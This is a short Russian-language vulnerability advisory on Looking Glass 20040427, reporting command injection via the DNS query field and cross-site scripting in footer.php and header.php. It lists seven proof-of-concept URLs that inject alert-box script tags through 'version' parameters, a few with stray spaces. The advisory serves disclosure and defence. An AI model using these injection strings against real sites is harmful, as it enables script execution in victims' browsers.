Выполнение произвольный команд и межсайтовый скриптинг в Looking Glass

Программа: Looking Glass 20040427

Уязвимость позволяет удаленному пользователю произвести XSS нападение и выполнить произвольные команды на целевой системе.
Программное обеспечение недостаточной обрабатывает входные данные в поле формы DNS запроса. Удаленный пользователь может с помощью специально сформированного значения параметра выполнить произвольные команды на целевой системе с привилегиями web севера.
Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта.

Примеры:

http://[target]/[path]/footer.php?version[fullname] =</a>< script>alert('lol')</script>

http://[target]/[path]/footer.php?version [homepage]="><script>alert('lol')</script>

http://[target]/[path]/footer.php?version [no]=<script>a lert('lol')</script>

http://[target]/[path]/header.php?version [fullname]=<script>alert('lol')</script>

http://[target]/[path]/header.php?version [no]=</title><script>ale rt('lol')</script>

http://[target]/[path]/header.php?version [author]=--><script>alert('lol')</script>

http://[target]/[path]/header.php?version [email]=--><script>alert( 'lol')</script>

Анатолий Ализар: Бывший автор новостной ленты «Хакера». Увлекается современными технологиями, оружием, информационной безопасностью, носимой электроникой и в целом концепцией Internet of Things.
Похожие материалы